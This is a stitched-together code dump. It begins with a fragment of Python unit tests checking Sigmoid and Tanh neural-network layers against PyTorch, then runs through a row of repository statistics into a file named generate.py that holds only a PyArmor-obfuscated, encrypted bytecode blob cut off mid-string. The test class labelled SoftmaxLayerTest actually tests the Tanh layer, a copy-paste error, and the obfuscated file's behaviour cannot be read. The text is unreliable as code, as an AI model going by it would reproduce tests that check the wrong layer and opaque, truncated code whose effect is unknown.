dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
def test_backward_cast_2(self):
layer = SigmoidLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.sigmoid(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
class TanhLayerTest(common.DlTestBase):
name = "TanhLayerTest"
module_name = __module__
def setUp(self):
super().setUp()
random.seed(1)
np.random.seed(1)
torch.manual_seed(1)
def tearDown(self):
super().tearDown()
def test_foward_case_1(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.tanh(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_forward_case_2(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.tanh(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_backward_cast_1(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.tanh(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
def test_backward_cast_2(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.tanh(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
class SoftmaxLayerTest(common.DlTestBase):
name = "SoftmaxLayerTest"
module_name = __module__
def setUp(self):
super().setUp()
random.seed(1)
np.random.seed(1)
torch.manual_seed(1)
def tearDown(self):
super().tearDown()
def test_foward_case_1(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.tanh(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_forward_case_2(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
actual = layer.forward(x)
x_torch = self.numpy_to_torch(x)
expect_torch = torch.tanh(x_torch)
expect = self.torch_to_numpy(expect_torch)
self.assertEquals(expect.shape, actual.shape)
self.assertClose(expect, actual)
def test_backward_cast_1(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[1.0, 2.0], [3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.tanh(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
def test_backward_cast_2(self):
layer = TanhLayer()
layer.initialize_parameters()
x = np.array([[-3.0, 4.0]])
y = layer.forward(x)
dy = np.ones(y.shape)
dx_actual = layer.backward(dy)
x_torch = self.numpy_to_torch(x, requires_grad=True)
y_torch = torch.tanh(x_torch)
dy_torch = torch.ones(y_torch.shape)
y_torch.backward(gradient=dy_torch)
dx_torch = x_torch.grad
dx_expect = self.torch_to_numpy(dx_torch)
self.assertEquals(dx_actual.shape, dx_expect.shape)
self.assertClose(dx_expect, dx_actual)
| 29.662539 | 60 | 0.623526 | 1,298 | 9,581 | 4.355932 | 0.050847 | 0.042448 | 0.070746 | 0.073576 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0 | 0.017489 | 0.259994 | 9,581 | 322 | 61 | 29.754658 | 0.779972 | 0 | 0 | 0.924303 | 0 | 0 | 0.005637 | 0 | 0 | 0 | 0 | 0 | 0.12749 | 1 | 0.095618 | false | 0 | 0.023904 | 0 | 0.167331 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9bbddde2fc312ce2fba47aff220f4443f0cf9722 | 25,147 | py | Python | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x06\x00\x33\x0d\x0d\x0a\x09\x2e\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x36\x18\x00\x00\x00\x00\x00\x08\x52\x24\xb5\x2c\xfa\x0e\xc4\x0d\x5e\xbf\xc0\x10\x8e\x80\xac\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x59\xeb\x1d\x5e\xf7\x37\x12\x93\x42\x78\x7e\x0a\xcf\x25\x9a\x82\x0c\xeb\x59\xf3\xa0\xc1\xe6\x77\x6f\xd5\x6f\x7e\x23\x6b\xb0\x41\xc2\x74\xf7\x79\x8a\xbf\xe4\x5d\xc4\x9c\x76\x94\xf0\x19\x28\xe0\xcc\xcc\x15\x16\x6a\xa2\x90\x35\x99\xd6\x93\xba\x4e\xdb\x71\x04\xff\x1a\xce\xa7\x3f\x78\x3b\x53\x5e\x00\xd1\x25\x62\xd3\x98\xa4\x26\xff\xfd\x43\xbe\xe5\xa0\x20\x30\x53\x05\x16\xbf\xab\xcc\x04\x8d\x57\x34\x36\x6d\x9b\x8e\xf1\x79\x5a\x4a\x10\xd5\xd3\xdc\x07\x66\x2c\x18\xcd\xa3\xc5\x38\x8d\x0b\x1f\x6b\x5c\xd2\xe1\xfe\xbd\xcf\x03\xc7\xff\xba\x63\x24\x3d\x51\x24\x9b\x24\xaf\xd4\x8a\xbc\xd5\x96\x69\x3b\x69\xba\xed\x14\x92\xdb\xc9\xcd\x6c\x32\x01\x85\xc9\xf0\x0a\xd1\x5e\x27\xd4\x38\x56\xbb\xf4\xa1\x3d\x4b\xa4\x26\xd3\x99\x9a\x6a\x4f\xa5\x75\x1c\xb8\x6e\xf2\xa8\x00\x56\xcf\x60\x7b\x0f\xd9\xe9\x0d\xf8\xc2\xec\x13\xfc\xdf\xef\x4b\x67\x0d\xba\xa2\x53\x0a\x67\xbf\xe0\x15\xa0\xfc\xa2\xda\x0c\xc6\x06\xe6\x33\xe1\x5d\x1f\x8e\x74\xac\xee\x19\x78\xc4\x0a\x64\x71\xd7\x2c\x52\x8f\xd8\x49\x32\x43\x9c\xcb\x05\x74\x09\x4a\x8d\xaf\x43\x32\x62\x36\xe3\xcb\x87\x30\xc6\x57\xa8\x24\x91\xf7\xe1\xa2\xbf\xcc\x32\xc9\xd1\x82\x09\x6f\xe3\x7b\x46\xcc\x6c\x3b\x47\x85\x1b\xc1\x8c\x7b\x7e\xec\x71\x94\x96\x08\xa7\x8c\xd3\xaa\xea\x0f\x08\x6b\x84\x14\x1e\xbf\x9b\xa7\xa7\x08\xe1\xc7\xa7\xc3\xef\x7b\xdb\x8a\x06\xe1\xe8\x5c\xa6\xbc\xe3\x77\x66\xe8\xb6\x6d\xbf\xd2\x18\x35\xc1\xa5\x31\x7c\x13\x77\x35\x50\xd0\xfd\xc9\x8f\x2f\x0e\x96\x05\x11\x07\xc4\x3e\xd3\xfc\xe7\xe4\x32\x8b\xc5\x6d\xd7\xb4\x55\xb8\xb2\x2c\xb4\x6d\xcb\x4b\x1b\x12\x90\xa5\x17\x96\xd8\x73\xa4\x5e\x00\xf4\xf5\x19\x18\xc1\xe0\x64\xc0\x0f\xd0\x2a\xe9\xca\xdc\xb3\xb3\xd7\xb4\xad\xe8\x93\x13\xb5\xa4\x4f\x6f\x06\x59\xb1\x06\xcc\x4c\xb7\x7b\xd4\xda\x0b\x86\x46\xd1\x4f\x63\xc0\xbb\xae\x32\xf4\x7f\x40\xee\x85\xad\x0b\x35\x08\xfe\x7c\x88\x3b\xc7\x3d\x31\x2d\x20\x0d\x59\xef\x59\xe3\x4f\x3c\x10\xb2\x7c\x99\x5c\xc1\x81\x94\xd4\x56\x28\x7d\x85\xd2\x35\xf3\x3e\x68\xa6\x82\x5e\x8b\x75\x99\x19\xdc\x3b\x0b\x13\xcb\x6d\xd5\x64\x8c\x00\xe0\xc2\xbd\x34\x3b\x22\x1d\xfd\xff\xcd\x59\x08\x11\x68\x01\x23\xb6\x61\xa1\x16\x5e\x9c\xdd\x66\xff\xb4\x7d\x4a\xe8\x22\x1d\x15\x86\xda\x5c\x48\x3c\xa4\x9b\x4b\x29\x4a\x08\xd9\x73\xad\x62\x43\xf6\x7d\x7a\xac\x9a\x19\xd7\x71\x38\x72\x46\xdb\x50\x86\x68\x11\x7d\x40\xcc\xab\xc6\x6c\x23\x00\x7a\x7f\x3e\x7c\xd4\xdd\xaa\xff\x6b\xd0\x9a\x13\x3b\x1b\x9b\x88\xdf\xf0\x3d\x72\xe6\x03\xb5\x43\xe3\x3d\x83\x2b\x46\xc8\xa5\x5c\xf1\x52\xc8\x4a\x81\xa3\x10\xae\x72\x89\xa6\xa8\xd0\x6d\xd1\x91\xfd\x1f\xe6\x13\x6b\x78\x98\x3c\xf6\x1b\x41\x77\x0f\x23\x6e\x01\x0a\xff\xee\x98\x90\x34\x21\xc5\xa2\xc2\x72\x7d\xed\xba\xb1\x97\xd7\xb5\x88\xb8\xd4\xbc\x8a\xc1\x09\xe2\xc3\xdc\xb6\x60\x3d\x43\xe4\x88\x76\xac\x20\x89\xad\x77\x01\x6c\x49\xef\xa1\xa7\xbe\xaf\x83\x6c\xa6\x86\x81\x00\x15\xd4\x9f\xbb\xdb\x0c\xf0\xca\x5a\xe4\xdd\xeb\xfd\x2a\x21\x76\xf3\x62\x40\x55\x7c\xa5\x03\xb3\xa0\xc8\x2b\xa3\xbf\xdb\xc2\xff\x3b\x9b\xd3\xfe\xa8\xa7\xfb\x0f\xc2\x3e\xbb\x14\x17\xa3\x23\xd1\xa6\xa5\xb7\x04\x5d\xa0\x20\xcb\xdf\x69\x99\xd1\xb0\x7c\xcc\x73\x26\x1a\x73\xcf\x9a\xb6\x12\x88\xe0\x10\x7d\x9f\xc9\xc2\x21\xe6\x67\x04\x77\xd5\x5a\xaf\xbf\xd0\xae\x8d\x64\x6f\x02\x94\xc5\x73\x33\xbc\xaa\x58\xc6\x63\x72\xc4\x60\xb8\xc2\x92\x44\x91\x67\x03\x83\xd6\x41\xa8\xa9\x6e\x22\x16\x7b\x70\xe4\xef\x7c\xca\xed\x17\x06\xb0\xce\xa5\x16\xd0\x56\x38\xad\xc1\x93\x4d\xfd\xc4\xe5\x49\x7e\x53\xe1\x08\xe2\x2e\x1e\xed\xd9\x56\x61\x4b\xba\x1c\x89\x5d\x80\x10\x29\x21\x16\x41\xcf\x01\x80\x1a\x9d\x8a\xf0\xff\xef\x71\x5d\x44\x45\x1f\x9f\x8e\xcd\x4d\xe5\x05\xec\x12\xfe\x87\x01\x3b\xbd\x52\x71\x51\xef\xd4\xa8\xd2\x48\xb3\x3d\x89\x15\x7c\x4c\x72\xde\x9e\x7d\x24\x8c\xe6\x91\xa3\x39\x4a\x0b\xa8\x3e\x83\x98\x24\x1e\x0a\x4e\x05\xdf\xab\x9b\x78\x2b\x79\x44\x00\x80\x50\x7b\x22\x3c\xd3\xdd\xdb\x6e\x4d\xde\x13\x9c\xd7\xa6\xe5\x49\x81\x74\x13\x1f\x35\x90\x35\x60\x21\xa3\xff\x0d\x46\xa7\x92\x39\x2b\xe5\x6c\x6d\xb7\xd5\xfd\xa5\xf3\xcf\x8a\xa5\x25\xb1\x80\x1c\x4a\xab\x45\xc5\x4e\x05\x45\x1d\x3b\xe6\xd1\xad\x01\x0f\xb6\x42\xcf\x4a\xce\xb7\x90\xef\x81\x00\xa0\x5b\x3e\xce\x92\x66\xa1\x7e\xb8\x01\x53\x0d\xf9\x9a\x68\x2b\xa9\x24\x7b\xbb\xa5\x20\xac\x66\x96\x5e\x04\xd7\x5f\x4c\x08\xf8\xfc\xc7\x9c\xa1\xdc\xda\x79\x3b\xfb\x7d\x00\x96\x9c\x39\x3d\x1d\x50\x56\x1d\xb9\xf2\x19\xac\x04\x14\x24\xeb\xbd\x49\x6c\x8d\xb4\x43\xe6\x7b\x46\x99\xad\xd7\x72\x21\x58\x13\x10\x28\xb1\xe3\x76\x18\x8a\x6f\xb5\x78\x91\xcc\xca\xdc\xcf\xfd\x51\x1c\x90\x92\x51\xcf\x50\x85\xad\x40\x59\x21\x12\xc3\x8f\x69\xd1\x50\xa2\xc5\x65\x99\xb5\x67\x3e\x39\x93\x22\x37\xbb\x44\x32\xac\x2e\xc6\x8c\x59\xc2\xe5\xf9\x8a\x53\xb5\x76\x26\x9a\x77\x4b\xec\x74\xba\xac\x26\x2b\xe3\x58\x0d\xd1\xda\x63\x08\xff\x97\x31\xd3\xf9\xf8\x44\xc9\x1d\x35\x7d\x17\xce\xbe\xec\x6d\xc1\x9e\x83\xf9\x67\x1d\x6c\x00\x78\x62\x02\x5a\xcb\x2f\xe8\x56\x7e\x36\x9e\x6b\xd5\xe1\x7a\xa3\xca\xa0\x8e\x86\x55\x32\xea\x8b\x1a\xea\x3c\xd9\xd4\xb0\xd2\xd5\x84\x54\xd6\xb4\xa9\x50\x14\x41\x9b\x69\x23\x4a\x83\xa5\x9f\xb7\x5c\x49\x28\xf7\xb3\x82\x74\x95\xfe\xfb\xd9\x5e\x85\xe5\x91\x85\xd0\x04\x11\xad\xfa\x17\xab\x67\xd0\xa0\x0f\x68\xfe\x2d\x52\x17\x25\x8e\x61\x7f\x9f\x7f\x3a\x5d\xd0\xa1\x80\xdc\xad\x7a\xdd\xae\x3c\x20\x53\xc5\x1d\xdc\xab\x07\xe1\x99\x08\x36\x44\x79\x5b\x15\x05\x65\x98\x7c\x21\xb1\x59\xfe\x81\x08\x34\x51\x98\x83\x14\xeb\x8c\xbc\xf2\x50\x91\xfb\x80\xa0\xcd\x4d\x9f\x96\x80\xbd\xf6\x34\x10\xeb\x49\xfe\x2a\xf5\xc0\xcf\x0e\x8b\x5e\xad\xcd\xd7\xc4\x97\x1f\x97\x5d\xce\x13\xcf\x88\xed\xa9\xcc\x11\x1c\xa8\x4a\x7c\x3a\xf3\xff\xa2\x68\x3e\xbf\xa3\x5c\x7a\x1e\x7e\x1e\x7b\x27\x16\xd6\xc5\xfd\x97\x25\x84\xd7\x54\x27\x21\x9b\x0b\x32\x73\xd3\xd4\x78\x55\xd5\xad\xcb\x3f\x54\xf4\x91\x47\x5c\xaa\xeb\xdd\x40\xe2\xe2\x20\x57\xd8\x18\x7e\x82\xd0\x84\xf8\x1e\x58\xf0\x67\xbc\xe8\x1f\x92\x24\xae\xb5\x72\xe8\x22\x5a\xb0\xd4\x78\x31\x8b\x27\x97\xd3\x84\xfc\xab\xd8\x86\x41\xa4\x09\x32\xec\xed\xb1\x6c\x19\x65\xe0\x6c\x1f\x1d\x53\x39\x2b\x22\x29\x5a\xc4\xe4\x9f\xe8\xdd\x69\x0e\x64\x55\x78\xc1\x01\x1b\x2e\xbd\xf5\x5f\x8f\xb2\xa4\x22\xb9\x04\x4e\x40\x23\x59\xe6\x45\xa6\x65\xff\xaf\x39\x49\x14\xbe\x94\x3d\x33\xa8\xd8\x3c\xcf\x04\x3e\x8d\xc3\xe1\xd1\x42\x09\x15\x75\xe9\xe0\x3f\x8b\xe1\x2b\xba\xec\x89\x73\x7d\x7f\xab\xaf\x1c\xd0\x4d\x67\x2c\x77\x34\xf7\xbd\xdc\x75\xaf\xd2\x7a\xa2\x1a\x2b\x0e\x61\x55\xed\x68\x2a\x3e\x05\xb1\x23\xe0\xf4\x9a\x67\x5d\x46\x3a\xfe\xd2\x05\x5e\x66\x99\x76\x9b\x6e\xc4\xe3\x31\x92\x7d\x11\x5a\xce\xb4\xa5\xd8\x9a\x54\x3e\x05\xfc\xef\x71\x06\x1a\xdf\xcd\x3d\x55\xa0\x59\x63\x8d\xe9\xab\x7d\x39\x85\x2c\x43\x7b\xf4\xaa\xa5\x61\xb4\x65\x4f\x87\x09\xbe\xe7\xbd\x09\x0d\x7f\xc5\x39\xe7\x20\x86\xa6\x81\xa3\x94\x9f\x23\xc2\xf6\x4a\x2a\x70\x15\x10\x9f\x8a\x45\xe1\x30\x3d\x5c\x19\x84\x39\xe7\x15\x79\x9a\x58\xa1\xf3\x1d\x54\x6d\xdd\xe5\xbd\x88\x36\x2e\x46\x35\x1b\x03\xf8\xec\xd0\x88\x73\xc2\xc9\x54\x41\x6f\x5e\x15\xc6\x9f\xdf\xdb\x39\x38\x23\xa4\x0b\x27\xe7\xa0\xe3\x97\x0a\xb6\x83\xe2\xf3\x74\x3d\x5b\xb6\x9c\x1c\x43\x9d\x06\xd9\x62\x9f\x8d\x72\x94\xc6\x1b\x6b\xe8\x78\x6e\x16\xc7\xad\x39\xe7\x09\x2c\x0d\x8a\x68\xc2\x92\xec\x23\x90\x9e\x5a\x7b\xef\x05\x33\xb0\xb6\x65\x95\x44\x5f\x40\x72\xed\xd2\xfb\xe7\x1d\x3c\x43\x26\x3a\x0c\x8b\xb5\x42\x91\x29\x42\x93\x7a\xc5\xab\x88\x12\xb9\x38\x5f\x85\x50\x74\xcd\x1c\x55\xd0\x4d\xc1\x1e\xf7\x78\x9e\x4f\x0b\xa1\xa7\xe7\xf7\x23\x9e\x4a\x3b\xbb\x6f\x20\xfb\xb2\xdf\x49\x88\xc6\x87\x91\xeb\x57\x69\xa9\xeb\x77\x74\x27\x46\xef\x12\xd1\x85\x10\xdd\x18\x24\x18\xc8\xe6\xd6\x91\xf1\x3d\x84\x22\xff\x81\xfc\x50\x4a\xbe\x1e\xe7\xa9\xa1\xd3\xd3\xf8\x97\x44\xa4\x23\xce\x13\x69\xa6\x34\x62\xcc\xe3\x57\x5e\x9c\x82\xe3\xdb\x07\xd1\xaf\x9b\x8f\xdc\x97\xeb\xda\xb6\x54\x93\x3e\x3b\x3f\x9a\xd6\x8d\xa5\xf6\x01\x0b\x61\x4c\x7a\x4d\x03\x39\x00\xf3\x12\x81\x5f\xe1\x65\xea\x3c\x16\xfa\x8f\xf7\xe9\xe7\x78\x37\xbe\x23\xf7\x21\x8e\x23\x62\x8e\xbb\xd3\x42\xf5\x25\xa4\x1c\xc7\xc2\x2c\x78\x29\x8f\x5e\xd8\xad\x3e\xea\xb8\xc6\xbf\xc9\x3c\x1f\xcb\x6c\x24\x31\x68\x1a\x70\xd8\x51\xf0\x6a\xbf\x09\x02\xb0\xe3\xed\x41\x8e\xe2\x36\x5f\xd9\x17\x26\x45\x4f\xa6\x1d\xdd\x3e\xbb\x2e\x24\xc9\x6a\xac\x44\xa4\x35\xe1\x5e\xe7\xe5\x78\x83\x2d\xbc\xd7\x29\x8c\x2d\x42\x03\x0d\xb7\xab\xb8\xba\x6e\xae\x22\x63\xb2\xa3\x4b\x7d\x08\xf0\xc0\xe2\x76\xd9\x57\x3b\x01\x56\x5b\x35\xf9\xab\xe4\xcb\xd6\x96\x64\x8d\x62\x36\x2e\x94\xdd\x4d\xdc\x44\x3f\x77\x1e\x9a\xde\xfc\x4a\xc2\x3e\x74\x5a\x5d\xb3\xb0\xc0\x29\x84\x95\x60\x0a\x43\x13\x93\x82\x6f\x05\x18\x54\x74\x6b\xd0\x8f\x94\xb2\x82\x0c\x66\xf2\xd7\x0e\x49\x72\x4e\x8f\xd2\x42\x2d\x15\x8c\x80\x67\x8c\x0f\x26\x7b\x40\x8c\x6a\x25\xba\x4c\x79\xa3\x27\x64\xf2\x03\x1f\xfe\x79\x9e\x9a\x55\x2c\x4e\x20\xef\x91\x0c\x9c\x4b\xc9\xc5\xab\x2b\x51\x38\x64\x91\x9c\x56\x9e\xe6\x9a\x4e\x44\xe8\xe6\x0f\x79\xf0\xc3\x15\x7d\x07\x6e\x4f\xd8\x65\xee\x7b\xdd\x3b\x52\xf1\xc0\xfc\xeb\x08\xd4\x04\x4c\x77\x41\x11\x5b\x11\xed\x9d\x42\x7c\x49\x17\x7e\x48\x5f\xef\xbb\x98\x85\x3a\xe9\xe0\xcc\xa5\x51\x6d\x81\xac\x06\xdc\x71\x2a\x36\x1a\xa5\xa4\xdd\x06\x61\x8e\x64\x08\xd3\x42\x32\xaa\x6b\x8c\xe6\x0d\xad\x70\x1d\x0f\x26\x1e\xf2\x2d\x1f\x1f\x15\x5c\x45\xfe\xe3\x17\xb2\x04\xa3\x13\x79\x16\xc3\x17\x02\x39\xd2\x2b\xb8\xd7\x18\x56\x1b\x4d\xd2\x07\x1c\x17\x9f\x48\xb7\x9a\x18\x4d\xe3\xd9\x96\x5b\x0a\xdf\xc6\x65\x4d\x14\xb0\x16\x42\xe1\x77\x82\x73\x8b\x03\x9d\x45\x95\xa6\x6b\x06\xa7\xc3\x3d\xe0\x0b\x2a\xa0\xfe\xb0\x3d\x8f\x84\x06\x89\x2d\x1d\x1c\x04\xc7\x9b\xe6\x8e\x9f\xd1\x49\xc2\x10\xd7\xd4\xc1\xd3\xdd\xff\x41\x64\x04\x7d\xa3\xaa\x20\xb9\x1f\x98\xfe\xe0\x1e\x28\xd7\xa7\xa5\x52\xe4\x1e\x6b\x98\xa3\x49\x8b\xc8\x3b\x38\x83\x2f\x0c\xaa\xdd\xc2\x59\x31\xbb\x1f\x2c\x20\xe9\x75\x35\x2b\x68\x54\xf3\x87\xb9\x03\x1a\x57\x24\x68\x58\x4d\x0c\xe2\x24\x60\xef\x91\x7a\xef\xa4\x9d\xf5\xa3\x88\x4e\x44\xaa\x72\x9a\x34\x26\xfe\x2b\xc9\xc9\x78\xed\x2e\x12\x61\x36\xe4\xb6\x96\x0e\x86\x7e\xea\x9b\x00\xab\xe9\x65\xa2\xe0\x26\x63\x25\xbb\xd2\xaa\xc9\x99\x64\x33\xf6\xc1\x51\xb5\xb4\xdc\xbb\x54\xfe\xec\x1f\x84\x0e\xf0\x9b\x62\x3a\x95\x45\x96\x73\x60\x01\xa1\xf7\xe8\xf9\x38\x73\xf0\x05\xcc\x86\xb2\x61\xf7\x9b\x61\x1b\x45\x17\xa9\x56\xcf\x95\xce\x8f\x2d\xc6\xb4\x4c\xcc\x61\x12\x1e\xa1\xa3\x28\xa5\x26\x12\x7d\xb0\x4e\x3e\x95\xa0\x07\xc9\x11\x58\x8f\xdf\x42\x9d\xcc\xf4\x7e\x91\x73\xd0\x00\x40\x91\x17\x5d\x76\x05\x02\xdf\x71\x8e\x39\xdd\x52\x90\x58\xa8\xb4\xae\xc6\xb6\xde\xc4\x27\xcc\x74\xdc\x9a\x3c\xeb\x7f\x29\xc8\x3f\xba\x45\x67\xc1\xfb\xe0\x0c\xdd\xb0\x2b\xd1\xf6\xf4\x66\xa9\x28\xf2\x5a\x51\xa5\xba\xc1\x69\x51\x3e\xaa\xa2\xda\x97\x59\x8e\x2c\x7e\x20\x93\x89\xfa\x99\xec\x27\x62\xf6\x96\xf6\x18\xc3\xc4\xdd\xc6\xce\x1d\xa1\x44\xe4\x0c\xa5\x7c\x03\x6f\x9e\x3c\x72\xd5\x67\xcb\x27\x7a\xb8\x0b\x52\x0c\x38\x8b\x34\x64\xb5\x8c\x9e\xd2\xee\x74\x95\x28\x38\x97\x46\x37\x80\xc7\x86\xc5\x2f\xe1\xe0\x21\x2e\xa1\x81\x3f\xa2\x48\xb1\x13\xa9\x4c\x92\xbf\xdd\x54\x2a\x9f\xca\xe4\x96\xf9\xd7\xb4\x57\x0b\x3d\xbe\x42\x60\xa8\x26\x63\xdf\x8d\xd9\xf5\x87\x3d\x85\x1c\x6d\x67\x02\xd3\x50\xff\x7b\x18\x17\x31\x84\xf7\xb2\xda\xa9\xc0\xa6\x6f\x0e\x5a\x3b\xbc\x77\xbf\xbf\x16\x9a\x77\xf9\xca\x4c\x21\x25\x32\x0a\x1e\x16\x79\xdc\xf6\x40\x79\x68\xf8\x69\x48\xd4\xc5\x3f\x6d\xca\x03\xd7\xe2\xb7\xbd\x4a\x90\x9e\xca\x00\xb8\x25\x42\x3d\x77\xd2\x91\x4b\xe9\x64\xfc\x3f\x7f\xaa\x66\xa6\xa0\x77\xb3\xc3\x68\x4e\x6b\xea\xf9\xa2\xd9\x88\xc4\x03\x3a\x81\xef\xbc\x8d\x56\xfd\xb7\xa7\x26\xe9\x9b\x20\xfc\x04\x17\x25\xab\x3e\xf9\x34\xd9\xf8\xbb\xb2\xbe\xc1\x90\x20\x0c\xb0\x1c\xae\xee\xa2\x70\x02\x17\xb4\x3f\xce\x68\xd1\x50\xd1\x8a\x24\xfd\x98\x09\xc5\xc6\xcb\x22\x34\x1d\x1b\x88\xb2\xdf\x2b\x68\x89\xdb\x9e\xb2\xc0\x9e\xa1\x34\xaa\xbb\x28\xc2\x80\x2d\xd8\x1f\x2f\x90\x0d\x11\xf2\xd1\xe4\xa9\x0a\x07\x7e\x0d\x18\x5e\x83\xcc\xa1\x14\x9c\x42\x68\x61\x01\x0b\xa5\x0f\x6d\x94\xcb\xe3\xce\xeb\x21\x42\x30\x87\xb4\x2e\x07\x5d\x05\xc1\x49\x35\xa3\x05\x36\x21\x2e\xf7\x31\x4b\x2a\xdf\xb3\x40\x27\x25\xf2\x32\xd6\x6a\x15\x99\x95\x5d\xfd\x23\x6d\x39\x81\x17\x56\x35\xb0\x67\x8c\x89\xdd\xf6\x68\x88\x65\xcb\x6e\x01\x9b\xd6\xcc\x94\x2d\x1c\x3d\x95\xcb\x6c\x9c\x4f\x4a\xef\xf4\x24\xf3\xb3\x96\x8d\x69\xee\x69\x44\x90\x22\xf0\xb9\x29\x40\x6e\x13\xad\x6f\x69\x32\x68\x45\x51\x68\x47\x22\x89\xd7\x66\x06\x77\x09\x3b\xd0\x54\xd4\x9b\xcf\xcc\x2c\x94\x8d\xef\xf9\x5a\xd1\xe7\xcf\x16\x8f\x24\x8b\xa2\x63\x35\xca\x59\xa7\x84\x52\xf3\xca\xac\x98\xcb\x07\x1e\xd6\xd1\xc6\x78\x52\xb6\x7d\xe3\xae\x86\x3c\x39\x4d\x7e\x09\x82\x7a\xd1\x71\x62\xbc\xff\xf0\x65\xf1\xf9\x38\xac\xe7\x42\x47\x7f\xe8\x38\x8d\xdb\xeb\x20\x58\x88\x5e\xef\x7d\x6f\xad\xc0\xc1\xde\x49\x37\x3d\xd2\xee\x3c\xbc\x1c\x82\x5e\x4e\xf3\x40\xec\xc0\xf8\x4f\xe6\xd0\x65\x48\x23\x98\x36\x43\xbe\x75\x95\xe7\x71\x01\x47\x3e\xb3\x13\x19\x26\xa3\x8a\xad\x76\xd1\xd9\x4a\x81\x10\x58\x63\x28\x52\xa5\x4f\x94\x43\xc7\xbf\xe7\x02\x60\xc1\x29\x9f\xf3\x15\x96\x3a\xe8\x9c\x09\x05\xc7\x37\x29\x66\xf9\x00\x82\xb4\xf2\x6f\x5b\x33\xdd\xd8\xad\xdd\x26\xe4\x79\x66\x88\xbe\x79\xe7\x4f\x90\xb4\x01\x80\xeb\xda\x89\xc3\xc0\x77\x52\xe9\xcc\x3d\xa0\xbc\xf4\x93\x5d\xdd\x82\x2e\xc8\xcc\x3e\xc2\x12\xdb\x1a\x63\x96\x6e\x54\x62\xe4\x65\xc7\x38\x8d\xc5\x1e\x06\x54\xe6\x95\xed\x11\xde\x5a\xae\x62\x98\xcc\x98\xed\x2a\x4d\xff\xce\xa7\x68\xcd\xcf\xa8\xac\x77\xc8\xdf\x73\xa0\x59\x23\xde\x6c\x2a\x99\x84\x75\x82\x90\xf2\x5a\x2e\xe4\xe5\x64\x06\x34\x77\xe8\xe2\x57\xd9\x74\xb6\x0f\x14\x53\x3a\xf2\x89\xd3\x64\x7b\xe6\x26\x07\xe3\x21\x0f\xb3\xc7\x4f\xcf\x1a\xef\xc9\x95\xf4\xdb\xbe\xec\x6a\x62\xd2\x2a\x15\xf2\x82\xb5\x7c\xf0\x0c\x31\xc5\xa2\x25\xc0\x73\x84\xe5\x12\x74\x66\xcc\x03\x11\xc3\x7c\x08\xc0\xda\xa5\x3a\x01\xa7\x39\xe0\x27\x0a\xf2\xb9\xda\xe2\xea\xd5\x23